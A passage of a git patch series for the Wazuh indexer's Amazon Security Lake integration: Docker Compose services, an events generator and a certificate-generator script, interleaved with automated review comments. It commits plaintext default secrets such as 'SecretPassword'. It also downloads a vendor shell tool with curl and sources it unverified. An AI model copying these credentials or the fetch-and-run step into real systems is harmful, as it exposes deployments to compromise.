-1,3 +1,5 @@ +#!/env/bin/python3.9 + import transform import json diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ab399f58b7b9a..4aa650b158c54 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py 
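Review bot: After this change the keystore is still populated with the literal `admin`/`admin` via `echo "admin" | ... add INDEXER_USERNAME` and `... add INDEXER_PASSWORD`, and the keystore password now comes solely from `LOGSTASH_KEYSTORE_PASS` in the caller's environment (the removed `export` made that explicit), which the Dockerfile in this same commit fixes to a known string — so every image built from it carries default indexer credentials under `/etc/logstash`. Read the values from the environment instead, e.g. `echo "${INDEXER_PASSWORD:?}" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash`, so a missing value aborts rather than silently storing a default. Also add `set -euo pipefail` near the top of the script (outside the hunk) so a failed `create` does not leave a half-populated keystore behind.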
@@ -1,4 +1,4 @@ -#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 +#!/env/bin/python3.9 import os import sys diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/docker/amazon-security-lake.yml similarity index 69% rename from integrations/amazon-security-lake/docker-compose.yml rename to integrations/docker/amazon-security-lake.yml index 6c5c1c21445c9..67effe4deed55 100644 --- a/integrations/amazon-security-lake/docker-compose.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,5 +1,18 @@ version: '3' +name: "amazon-security-lake" services: + events-generator: + image: wazuh/indexer-events-generator + build: + context: ../tools/events-generator + container_name: events-generator + depends_on: + - opensearch-node + networks: + - opensearch-net + # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + opensearch-node: image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues container_name: opensearch-node @@ -21,6 +34,7 @@ services: - opensearch-data:/usr/share/opensearch/data networks: - opensearch-net + opensearch-dashboards: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes container_name: opensearch-dashboards 
@@ -33,16 +47,9 @@ services: networks: - opensearch-net logstash: + image: wazuh/indexer-security-lake-integration build: - context: . - dockerfile_inline: | - FROM logstash:8.12.1 - - COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh - COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config - - RUN bash /usr/share/logstash/bin/setup.sh - RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + context: ../amazon-security-lake container_name: logstash environment: LOG_LEVEL: trace @@ -53,12 +60,14 @@ services: - "5000:5000/udp" - "5044:5044" - "9600:9600" + volumes: + - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - opensearch-node networks: - opensearch-net command: tail -f /dev/null - # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash volumes: opensearch-data: diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore new file mode 100644 index 0000000000000..0f028b576338e --- /dev/null +++ b/integrations/tools/events-generator/.dockerignore @@ -0,0 +1,2 @@ +.venv +Dockerfile \ No newline at end of file diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile new file mode 100644 index 0000000000000..da32f8c042017 --- /dev/null +++ b/integrations/tools/events-generator/Dockerfile @@ -0,0 +1,4 @@ +FROM python:3.9 +COPY . /home/events-generator/ +WORKDIR /home/events-generator +RUN pip install -r requirements.txt \ No newline at end of file diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md index b11988192929e..ed8e53ea8acd9 100644 --- a/integrations/tools/events-generator/README.md 
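Review bot: The commented run command points at `/usr/share/logstash/pipeline/indexer-to-integrator.config`, but the pipeline renamed in this commit is `indexer-to-integrator.conf`, so it will fail as soon as someone uncomments it — `# command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash`. The new bind mount `../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline` also overlays the pipelines the image already copied in, and because the `indexer-to-file` pipeline writes its JSON dump into that same directory, the dump ends up in the repository checkout; mount it read-only (`:/usr/share/logstash/pipeline:ro`) and point file outputs elsewhere. Ports 5000/5044/9600 published on the host are pre-existing context, but with `LOG_LEVEL: trace` and cleartext indexer credentials in this stack the README should say clearly that this compose file is for local development only.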
+++ b/integrations/tools/events-generator/README.md @@ -41,3 +41,14 @@ INFO:event_generator:Event created INFO:event_generator:Event created {'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1} ``` + +### Building the Docker image + +```console +docker build -t wazuh/indexer-events-generator:latest . +``` + +Run with: +```console +docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h +``` \ No newline at end of file diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 3a6a4aeba9fc0..9b56f6969c505 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -1,4 +1,4 @@ -#!/usr/bin/pyton +#!/usr/bin/python3 # Events generator tool for Wazuh's indices. # Chooses a random element from /alerts.json to index @@ -136,6 +136,11 @@ def parse_args(): parser = argparse.ArgumentParser( description="Events generator tool for Wazuh's indices. Indexes a random element from /alerts.json", ) + parser.add_argument( + '-i', '--index', + default="wazuh-alerts-4.x-sample", + help="Destination index name or alias" + ) parser.add_argument( '-o', '--output', choices=['indexer', 'filebeat'], @@ -143,9 +148,9 @@ def parse_args(): help="Destination of the events. Default: indexer." ) parser.add_argument( - '-i', '--index', + '-m', '--module', default="wazuh-alerts", - help="Index name or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities)" + help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name." ) # Infinite loop by default parser.add_argument( 
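Review bot: The new `-m/--module` option's help says the value "Must match a subfolder's name", but nothing enforces it — `main` builds `f"{args['module']}/alerts.json"` from it directly, so a typo surfaces as a raw `FileNotFoundError` from `Inventory` rather than an argparse error. Pass `choices=` built from the directories next to the script (`[p.name for p in Path(__file__).parent.iterdir() if (p / "alerts.json").exists()]`) so argparse rejects bad values and lists the valid ones in `-h`. Note that `-i` changed meaning in this hunk (it was the module selector and is now the destination index), which is worth a line in the README for anyone with the old invocation in their shell history.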
@@ -189,7 +194,7 @@ def parse_args(): def main(args: dict): - inventory = Inventory(f"{args['index']}/alerts.json") + inventory = Inventory(f"{args['module']}/alerts.json") logger.info("Inventory created") publisher = PublisherCreator.create(args["output"], args) logger.info("Publisher created") From 17f47caec1e9db250585e01878ae4a0a62657f43 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:58:02 +0100 Subject: [PATCH 49/77] Fix events-generator's Inventory starvation --- integrations/tools/events-generator/run.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 9b56f6969c505..ec4ded0010c76 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -42,9 +42,11 @@ def __init__(self, path: str): self.size = len(self.elements) def get_random(self) -> str: + """ + Returns the last element of the list + """ random.shuffle(self.elements) - return self.elements.pop() - # return self.elements[random.randint(0, self.size)] + return self.elements[self.size-1] # ================================================== # From 204948fdad9f77095e625a8278e06c212b26f2f0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:08:30 +0100 Subject: [PATCH 50/77] Remove files present in #147 --- .../stdin_to_securitylake.py | 91 -------------- .../transform/legacy/legacy_converter.py | 87 ------------- .../transform/legacy/legacy_test.py | 15 --- integrations/docker/docker-compose.yml | 117 ------------------ 4 files changed, 310 deletions(-) delete mode 100755 integrations/amazon-security-lake/stdin_to_securitylake.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_test.py delete mode 100644 integrations/docker/docker-compose.yml 
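Review bot: `get_random` now shuffles the whole inventory on every call only to read one element, and the new docstring "Returns the last element of the list" describes the indexing trick rather than the intent; `return random.choice(self.elements)` does the same job in O(1), leaves the list order untouched and is self-documenting ("Return a random element of the inventory"). An empty inventory raises `IndexError` either way (`self.size-1` is `-1`), so if that case is worth a clearer error, check `self.size` in `__init__`, which lies outside this hunk. The enclosing `Inventory` class starts outside the hunk as well.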
diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py deleted file mode 100755 index 4aa650b158c54..0000000000000 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ /dev/null 
@@ -1,91 +0,0 @@ -#!/env/bin/python3.9 - -import os -import sys -import argparse -import logging -import time -import json -import datetime -from pyarrow import parquet, Table, fs - -from transform import converter - -block_ending = { "block_ending": True } - -def encode_parquet(list,foldername,filename): - try: - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) - except Exception as e: - logging.error(e) - raise - -def map_block(fileobject, length): - output=[] - ocsf_mapped_alert = {} - for line in range(0, length): - line = fileobject.readline() - if line == '': - output.append(block_ending) - break - alert = json.loads(line) - ocsf_mapped_alert = converter.convert(alert) - output.append(ocsf_mapped_alert) - return output - -def get_elapsedseconds(reference_timestamp): - current_time = datetime.datetime.now(datetime.timezone.utc) - return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') - parser.add_argument('-s','--sleeptime', type=int, action='store', 
default=5, help='Input buffer polling interval') - args = parser.parse_args() - #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - - try: - - with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: - output_buffer = [] - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - - try: - while True: - - current_block = map_block( stdin, args.linebuffer ) - - if current_block[-1] == block_ending: - output_buffer += current_block[0:-1] - time.sleep(args.sleeptime) - else: - output_buffer += current_block - - if len(output_buffer) == 0: - continue - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - logging.info('Writing data to parquet file') - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] - - except KeyboardInterrupt: - logging.info("Keyboard Interrupt issued") - exit(0) - - logging.info('FINISHED RETRIEVING STDIN') - - except Exception as e: - logging.error("Error running script") - logging.error(e) - raise diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py deleted file mode 100644 index 2a14b75957c97..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py +++ /dev/null 
@@ -1,87 +0,0 @@ -#!/usr/bin/python - -# event comes from Filebeat -event = {} - - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template 
diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py deleted file mode 100644 index ebcb8fa4b2e90..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_test.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/python - -from transform.legacy.converter import convert -import json - -converted_event = {} -with open("../wazuh-event.sample.json", "r") as fd: - sample_event = json.load(fd) - # print(json.dumps(sample_event, indent=4)) - converted_event = convert(sample_event) - -if converted_event: - with open("../wazuh-event.ocsf.json", "w") as fd: - json.dump(converted_event, fd) - print("Done") diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml deleted file mode 100644 index dd7f12f119e05..0000000000000 --- a/integrations/docker/docker-compose.yml +++ /dev/null 
@@ -1,117 +0,0 @@ -version: "3.8" - -services: - - events-generator: - image: events-generator - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y python3-requests - container_name: events-generator - volumes: - - ../tools/events-generator:/home/events-generator - hostname: events-generator - working_dir: "/home/events-generator" - entrypoint: sh -c "python3 run.py" - networks: - wazuh-indexer-dev: - aliases: - - events-generator - ipv4_address: 172.18.0.2 - depends_on: - - wazuh-indexer - - wazuh-indexer: - image: wazuh/wazuh-indexer:4.8.0-beta1 - container_name: wazuh-indexer - hostname: wazuh-indexer - restart: always - networks: - wazuh-indexer-dev: - aliases: - - wazuh-indexer - ipv4_address: 172.18.0.3 - ports: - - "9222:9200" - depends_on: - - generator - environment: - - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" - - "bootstrap.memory_lock=true" - - 'INDEXER_PASSWORD=SecretPassword' - ulimits: - memlock: - soft: -1 - hard: -1 - nofile: - soft: 65536 - hard: 65536 - volumes: - - ./wazuh-indexer-data:/var/lib/wazuh-indexer - - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem - - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key - - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem - - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem - - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem - - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml - - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml - - generator: - image: wazuh/wazuh-certs-generator:0.0.1 - hostname: wazuh-certs-generator - volumes: - - ./config/wazuh_indexer_ssl_certs/:/certificates/ - - ./config/certs.yml:/config/certs.yml - environment: - - 
HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS - - logstash: - image: logstash - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https - WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ - apt update && \ - apt install -y logstash && \ - chown -R logstash:logstash /etc/logstash && \ - chown logstash:logstash /home/logstash - entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic - container_name: logstash - hostname: logstash - user: logstash - volumes: - - ../amazon-security-lake:/home/logstash - - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf - - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml - networks: - wazuh-indexer-dev: - aliases: - - logstash - ipv4_address: 172.18.0.4 - depends_on: - - wazuh-indexer - - s3-ninja - - s3-ninja: - image: scireum/s3-ninja - container_name: s3-ninja - hostname: s3-ninja - volumes: - - ./s3-ninja_data:/home/sirius/data - networks: - wazuh-indexer-dev: - aliases: - - s3-ninja - ipv4_address: 172.18.0.5 - ports: - - "9444:9000" - -networks: - wazuh-indexer-dev: - ipam: - config: - - subnet: "172.18.0.0/16" From 5fcc9a394a339f373a5a7a557bc302b7efcfc42e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:19:33 +0100 Subject: [PATCH 51/77] Cleanup --- integrations/amazon-security-lake/run.py | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index 515d1d97610f9..c26adffa2ea0f 100644 --- a/integrations/amazon-security-lake/run.py 
+++ b/integrations/amazon-security-lake/run.py @@ -17,19 +17,9 @@ def _test(): print("--") print("") print(ocsf_event) - # event = Event.model_validate_json(json.dumps(event)) - # print(event) - # ocsf_event = to_detection_finding(event) except KeyError as e: raise (e) - # except ValidationError as e: - # print(e) - - # if ocsf_event: - # with open("wazuh-event.ocsf.json", "w") as fd: - # json.dump(ocsf_event.model_dump(), fd) - # print(ocsf_event.model_dump()) if __name__ == '__main__': From a2464104dfcddfb28f4376d12a38bd1cc07ac3e1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 18:06:09 +0100 Subject: [PATCH 52/77] Add FQDN hostnames to services for certificates creation --- integrations/docker/amazon-security-lake.yml | 49 +++++++++++--------- 1 file changed, 26 insertions(+), 23 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 67effe4deed55..5c2b09d133089 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml 
@@ -7,20 +7,21 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" - opensearch-node: - image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues - container_name: opensearch-node + wazuh.indexer: + image: opensearchproject/opensearch:latest + container_name: wazuh.indexer + hostname: wazuh.indexer environment: - - cluster.name=opensearch-cluster - - node.name=opensearch-node - - discovery.seed_hosts=opensearch-node - - cluster.initial_cluster_manager_nodes=opensearch-node + # - cluster.name=opensearch-cluster + - node.name=wazuh.indexer + - discovery.type=single-node + # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: 
@@ -31,26 +32,28 @@ services: soft: 65536 hard: 65536 volumes: - - opensearch-data:/usr/share/opensearch/data + - data:/usr/share/opensearch/data networks: - - opensearch-net + - net - opensearch-dashboards: + wazuh.dashboard: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes - container_name: opensearch-dashboards + container_name: wazuh.dashboard + hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 expose: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards environment: - OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - - opensearch-net - logstash: + - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake - container_name: logstash + container_name: wazuh.integration.security.lake + hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" @@ -63,14 +66,14 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash volumes: - opensearch-data: + data: networks: - opensearch-net: \ No newline at end of file + net: \ No newline at end of file From bf3f1ffdaa2ee9253f59e27ba58c2b3974f95a72 Mon Sep 17 00:00:00 2001 
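Review bot: `LOGSTASH_KEYSTORE_PASS: "SecretPassword"` sits in plain text in the environment block of the renamed `wazuh.integration.security.lake` service; it is a context line rather than new code, but this password is what protects whatever credentials get stored in the Logstash keystore (the pipeline later in this series reads `${INDEXER_USERNAME}`/`${INDEXER_PASSWORD}`), so the rename is a good moment to stop committing it. Read it from an untracked `.env` instead, `LOGSTASH_KEYSTORE_PASS: ${LOGSTASH_KEYSTORE_PASS:?set in .env}`, and keep the compose file free of secrets. `LOG_LEVEL: trace` will also echo pipeline events, presumably including alert contents, into the container logs; if that is intended for this dev stack, a one-line comment saying so would prevent it being copied elsewhere.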
From: Fede Tux Date: Thu, 22 Feb 2024 16:35:33 -0300 Subject: [PATCH 53/77] Add certificate generator service --- integrations/docker/amazon-security-lake.yml | 28 ++++++++- .../docker/wazuh-certs-generator/certs.yml | 16 +++++ .../wazuh-certs-generator/entrypoint.sh | 61 +++++++++++++++++++ 3 files changed, 102 insertions(+), 3 deletions(-) create mode 100644 integrations/docker/wazuh-certs-generator/certs.yml create mode 100644 integrations/docker/wazuh-certs-generator/entrypoint.sh diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 5c2b09d133089..2ae38b84a4baf 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,6 +1,7 @@ version: '3' name: "amazon-security-lake" services: + events-generator: image: wazuh/indexer-events-generator build: @@ -14,8 +15,10 @@ services: command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" wazuh.indexer: - image: opensearchproject/opensearch:latest + image: opensearchproject/opensearch:2.11.1 container_name: wazuh.indexer + depends_on: + - wazuh-certs-generator hostname: wazuh.indexer environment: # - cluster.name=opensearch-cluster @@ -37,8 +40,10 @@ services: - net wazuh.dashboard: - image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + image: opensearchproject/opensearch-dashboards:2.11.1 container_name: wazuh.dashboard + depends_on: + - wazuh.indexer hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 
@@ -48,11 +53,14 @@ services: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake container_name: wazuh.integration.security.lake + depends_on: + - wazuh.indexer hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace @@ -72,8 +80,22 @@ services: command: tail -f /dev/null # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + wazuh-certs-generator: + image: wazuh-certs-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt-get update && apt-get install openssl curl -y + WORKDIR / + COPY wazuh-certs-generator/entrypoint.sh / + RUN chmod 700 /entrypoint.sh + ENTRYPOINT ["/entrypoint.sh"] + volumes: + - ./certs/:/certificates/ + - ./wazuh-certs-generator/certs.yml:/config/certs.yml + volumes: data: networks: - net: \ No newline at end of file + net: diff --git a/integrations/docker/wazuh-certs-generator/certs.yml b/integrations/docker/wazuh-certs-generator/certs.yml new file mode 100644 index 0000000000000..c3e017be10eea --- /dev/null +++ b/integrations/docker/wazuh-certs-generator/certs.yml @@ -0,0 +1,16 @@ +nodes: + # Wazuh indexer server nodes + indexer: + - name: wazuh.indexer + ip: wazuh.indexer + + # Wazuh server nodes + # Use node_type only with more than one Wazuh manager + server: + - name: wazuh.manager + ip: wazuh.manager + + # Wazuh dashboard node + dashboard: + - name: wazuh.dashboard + ip: wazuh.dashboard diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh new file mode 100644 index 0000000000000..d3e0534e9be85 --- /dev/null +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh 
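Review bot: The new `wazuh-certs-generator` service writes every generated private key into the bind-mounted `./certs/` directory inside the repository tree, and nothing in this commit keeps that directory out of version control; add a `.gitignore` entry for `integrations/docker/certs/` (or use a named volume) before the first `docker compose up` leaves a CA key next to the compose file. The entrypoint added in this same commit copies `/certificates/root-ca.key`, so the CA private key is evidently among those files. The inline Dockerfile also builds from an unpinned `ubuntu:20.04` and runs `apt-get install openssl curl -y`; `--no-install-recommends` plus `rm -rf /var/lib/apt/lists/*` keeps the throwaway image small, and a digest-pinned base keeps it reproducible.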
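Review bot: `certs.yml` declares a `wazuh.manager` server node, but no such service exists in this compose file, so the tool will mint an unused certificate and private key for it into `./certs/`; drop the `server:` entry and keep the list to `wazuh.indexer` and `wazuh.dashboard`, the only hosts that will present these certificates. Every key that is generated but never used is one more file that has to be protected for no benefit. The `ip:` fields hold DNS names rather than addresses; the Wazuh tool presumably accepts that for the SAN, but the field name is misleading enough to deserve `# compose service names; resolved on the compose network and used as SAN entries` above the block.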
@@ -0,0 +1,61 @@ +#!/bin/bash +# Wazuh Docker Copyright (C) 2017, Wazuh Inc. (License GPLv2) + +############################################################################## +# Downloading Cert Gen Tool +############################################################################## + +## Variables +CERT_TOOL=wazuh-certs-tool.sh +PASSWORD_TOOL=wazuh-passwords-tool.sh +PACKAGES_URL=https://packages.wazuh.com/4.8/ +PACKAGES_DEV_URL=https://packages-dev.wazuh.com/4.8/ + +## Check if the cert tool exists in S3 buckets +CERT_TOOL_PACKAGES=$(curl --silent -I $PACKAGES_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') +CERT_TOOL_PACKAGES_DEV=$(curl --silent -I $PACKAGES_DEV_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') + +## If cert tool exists in some bucket, download it, if not exit 1 +if [ "$CERT_TOOL_PACKAGES" = "200" ]; then + curl -o $CERT_TOOL $PACKAGES_URL$CERT_TOOL -s + echo "The tool to create the certificates exists in the in Packages bucket" +elif [ "$CERT_TOOL_PACKAGES_DEV" = "200" ]; then + curl -o $CERT_TOOL $PACKAGES_DEV_URL$CERT_TOOL -s + echo "The tool to create the certificates exists in Packages-dev bucket" +else + echo "The tool to create the certificates does not exist in any bucket" + echo "ERROR: certificates were not created" + exit 1 +fi + +cp /config/certs.yml /config.yml + +chmod 700 /$CERT_TOOL + +############################################################################## +# Creating Cluster certificates +############################################################################## + +## Execute cert tool and parsin cert.yml to set UID permissions +source /$CERT_TOOL -A +nodes_server=$( cert_parseYaml /config.yml | grep nodes_server__name | sed 's/nodes_server__name=//' ) +node_names=($nodes_server) + +echo "Moving created certificates to the destination directory" +cp /wazuh-certificates/* /certificates/ +echo "Changing certificate permissions" +chmod -R 500 /certificates +chmod -R 400 /certificates/* +echo "Setting UID indexer 
